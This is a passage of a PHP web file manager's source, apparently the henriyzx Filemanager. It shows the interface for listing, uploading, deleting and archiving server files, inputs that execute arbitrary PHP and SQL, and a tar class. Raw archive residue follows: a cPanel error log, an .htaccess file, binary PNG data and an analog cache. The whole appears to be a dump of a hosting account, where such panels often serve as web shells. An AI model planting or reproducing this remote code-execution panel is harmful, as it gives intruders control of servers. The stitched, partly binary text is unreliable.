. $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/henriyzx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK �)�[]�1�< < error_lognu �[��� [14-Aug-2025 00:34:37 UTC] PHP Warning: Unknown: Failed to open stream: No such file or directory in Unknown on line 0 [14-Aug-2025 00:34:37 UTC] PHP Fatal error: Failed opening required '/home/gqdcvggs/play.peerkinton.com/akcc.php' (include_path='.:/opt/cpanel/ea-php81/root/usr/share/pear') in Unknown on line 0 PK �)�[6O}� .htaccessnu �[��� # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit PK HG�[%��5n n failref.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��M����H� ��vP�6�yxj��0����֏%˒��%����c�#�ھ���/R�~���ބ������p���~�� �1��%IE�1��T N��E� ,@�D� ,@�D� ,@�D� ,@�D� �ūm��k,>o��7�fXR^�U��%e�a�k0տV��ջ����Q���w�X���'` ��K���%��,���|<���,6�ޗ ��ϏUX�k�Q�`I�j�W�u�%V�,�Wۭ~�X�Q��e�`M,�u�1��\�`���bX�1�eV�I,���0��� Ja��`uw�SK>6�**[jƿ��*��CV^��*)[�b#�rOl�� �x�VX��a��,>�RG`�F-�S�&�a-Y��Z/[ Xrl��49��� J`- V9����L���`B���#���!W�aA�DŽ ��P����(�M*��,X� ���Z�,5�q\B����L��۰�P3�5�)n3{�����V��z�l ����t��obm�����m�:�XX+A�a���q��[�ⷝ�V��o�6Y �`v���<�I�����aM�)�N��1���qk���7���;���t.��8�~3E�g[�>�I�AS0U�wW�v�s�5X�~Xh�&�5�`J�fk�X���hX�4kV`�FXqk]�a�Ҭ��R�JX��I�4�aE�����ZE��֪K��mW[YX�w���Ρ���~�f��`q�*�CVz�8�ռ�%f3��:M�b��`%���ղ���Y�����j��2g?j+�43W��R�����ZV�~�tv-���;,��ÊX����Æ�,�X�VO=X3cŬ�JX�����%�V�,մi�4��������V�~�jTݮ���%� �� +n-kR�~�:��a-�UVD��Y|w�( ��ZX�u������"ֺ��ߨ!X�R��)\��u�&`E���+f-����h !�Bk���.֥��1�L[�&`�R��+���EW&+��+`ōZ��VV����n��z'X�~V��5��p�ۚ&V��Oa�CV$����ʴ��T�M�wVX��.Ua�-n��.�K���ߊy'X�'�ҁZ��W�ZX��Z��,Z,�ϚX--�&��S˾��a%�X������ϊ���mT1�cU�:�Z�fֺW�5I��=!ܓ��fk��L w�*9���I�oNmPV�Y����VQX_�9$X�}^s�|k]`X�n��a]�d�֙`y�ԠҴn�`�9T�L?q�;����� V�wW�iۯϪ��L�J�r9�W���,�:.C�B֧�L���Xa�J�J5�֜��>��icVr�xn��Y�Z_���ʵ=� +E��V����T�.1�gه�`qd�C��W�QXA��c��,�,��q��� �e��BXb�Y���Y]X���b��� r�ju}���ggCXѝ� ���g�21��~�QV���\��k�t�L��U3�x<�*��u��;�z��7���к5���Z���.!Λa��Uk�S�>��`�Ӻ����L���ݎ��Xǭ����YWx���%Ck��$�*���:wX�ᒖ���u��!�;�8����<k�RZg�U0\9Y�N�V% V9,C�L��h���V٘O�Z�`�Һ,�֙`�[,@��K|cXW����֡�Ђ�8l�f��6�g�� ��`"X� ��`"X� ��`"X��h*����`"X� �:�Z:�ΐ`!"X�����[�"��`"X�V?����3$X����B�M!�BD� e>Ʈ�\�"��`J|n;���?��!�#�`!"X���wX4��G��i����"X�����,��N!�BD� %�߰�c���6�ֱ�E���� ���0���M�upc,D)X-rx�&a���эE�%a����S��U�Z�7�B��U;��OaVmk�XQV�v������XYX5�Ճ���߾^]9Xl�'�%ԅ���U�*��ZA��XQV����5Xu��Ů��ª�C�$��j�����n��X�T�X��V?�*���juS��`�b?!,��+���֎ ~u�BX|3��X���\�z*X��Ʋ�U�bŰ6��� +���l�ƪֆ��Y�b ,�l�V��I(���B��$��A����a�4�_=f��� � �D�b|=���z5 ��ůnQm���bw�8�6���ʢ촲m�5(���*m�5�V���J�O�_���]C�my{��D� ,@�D� ,@�D� ,@��;Y�\�gO��nX.N��t+|�����-73��I�n��[@����Ӊ}i������ w�T?��A*�u33��9�g�B���ɹY��5Ngz�f=ܬ�n�}�)k�1nz�Oh����ԝQzm��9q��z�bD��R4�� ��U��f�.�j`f`i���1�ݍ�e�v�4��zX�b�Ky����q`���.����Ỹ%�nm>, w�bV����n�`�m��a��e�)I�x��a����J���"��K��� �1�Q1�l�x��������+��:��{�n��f����ILr�)V���Ɨ��@�̼�U�}�`���Nw�dn�k���r4O熀 ��`"X� ��`"X� ��`"X� �HÒ�"��~� �c����8�����X�`d�b���R��L��� IEND�B`�PK HG�[uKwB B size.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx���_r�8p��-�}r�T.�S�l����aAB����qe��/ݍQ%c�ק���q�C�'o��C-�xW�RZļ�X������QB�`�#X@�`, �D���"X@�`, �D���"X@�c�l�����������j�_O���lږ}3��j�� �����ڃ�TK,�յK�z>X}uq�±ڵ��źQ,�>�Q��O|���rZЋ��qmE�mA/֟�7�9amZ0��x|���/ ��}V~�˹`�zЇ�=��N�cy{0�ű�X��`�y��T,�k�փ]#R��V�onZD���`u�����}���DhX��Ǣ�� V3\^�L�f�u!a�V�0�\,ݘ�j^_jsQ�75 +f�YuXZƖ��4�e��4j���Vzl���ESVl`m��5Vrl�Z5���Xu̬h&�Rc�Weś0��hDVX�&ܬ��V�FLcUt4L4!+ވ.V?���eE��~�䤰R��ڌ,�ˇZ��JN, �ŚV� ,_�_>Ԓ8��HXL1�E(,��ʌ�YQ,�����r'��>R��}���^�WZ��L,"V����W����um�JOi�5VhdEq�5�^����ⶡ���1�хcѺp����� `��Yv��ry"X�¢b�J�TYm�mH,,2V��hm��Ê�,2V4�pf������]�Z�gٍ�֢_gQ���/�ue���X����l:�E�B:V�g�!,ra-%nUi ����0�E/�Vbd�K�����h����^5�gѻ���^����h��za%G���\,g�j��,��b�g���sC�_X�.�k��Y%�g]��Z�2XE�g]_YN������0�|Cˇ�ݟ�*yf!��amK��rV�� W��YWb�ԅ3VGª�dZ��4�&,�Ȫ{�F��x��.��h]Xw ���FֈEYU-�"X@�X���:2V�CK��l��.�X�.���`Ʉ� �`���B�8V���<X��,��c!]� ��8V�^��d��F�` �`9q����aX�H,�K�k�X�` �&�$:�K�hX�` �6�$j�^�y�0V�k4�+k���B�t��]���~_�v��=����]��Z�k�h�)־�~O�����X�[�vX������aW7�:��Rk4��]�����;a�7�:>��ya��y�Րj�d�L��X��3,���ւC�Y4��V���v�XG;{�����p��5X��;�EfWC���(V�q��䇥O��xd���\�N�L����ԯ�ZpH��u�Uͅ�_���"X@��aѝ�U�|���iVU�`!�SwV�](XHH� O��{d��f�;���,$�w�=Ū�.��vwV�%XHBXg�a�]�:��j/,�B��߇�wa+iU_X��$������V�Ҫ��I+o2��V��bPXQ���š�~����uJbXB�Eaű�M-+���y�`!�c��C]���SZ,�*���Ȥ �X9�I��7"�� ,.��uxj�),�ѩ�fb���5"�&$ajDFMH�:Јߌ����wk���a�[���b�[��"c�[���c�[ܬ�X;���� ,xlqX �R�o���:�_*�D�=�@,j'~s�A�b_A𤂱�N�b�r^ A����͖jV�ٝ�,��o�P/�L'��=X}�\�;�d'��ݪ����2�8��q��!��=d{,��8֍"X@�`, �D���"X@�`ټ'k�nΌ����j�vn����EW�ھ���E��?6�2}��AC�j�/ϰ�����¬zn�'mk>����+���b.��vk��W֍�xM�ǽY��j��w:����'2�v.��+�[D��m{3��{k�kZ�fs_���/�� �'` Dk3���rs��`ٺp�潩�tokzӽ�f{�8,�����Rv���_OuUYj���[����Z�a�r�Q�ͭ�y�S˨�{�^X�H�����:ʖ�z�un��^X������[R#������3[/�a� jܮ�e1���1C}q���j����i��}6�i�4��F��{K{��á�����'��"J��D� ��"X@�`, �D���"X@�`, ���2`}�KHy�ޮ~����"�MIa����!� xs IEND�B`�PK HG�[ZP�3�� �� cachenu "�] � CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete! T 0 0 326 212 3 1094 287025 D 29177004 29411484 20261 232 1 0 64 20261 233 28 8 22305 20261 241 1 1 616 20261 242 4 4 5064 20261 252 24 8 22412 20262 96 1 1 616 20262 134 1 1 616 20262 174 1 1 616 20262 246 1 1 1266 20262 279 2 2 1232 20263 229 1 1 616 20264 115 1 1 616 20264 228 2 2 1232 20265 240 1 1 616 20266 103 1 1 616 20268 115 1 1 616 20268 124 1 1 1262 20268 201 1 1 1266 20276 54 1 1 1266 20276 109 1 1 616 20278 87 1 1 616 20281 160 1 1 616 20282 23 1 1 616 20282 206 5 1 4989 20283 207 1 1 616 20285 28 3 3 2498 20285 224 1 1 616 20286 9 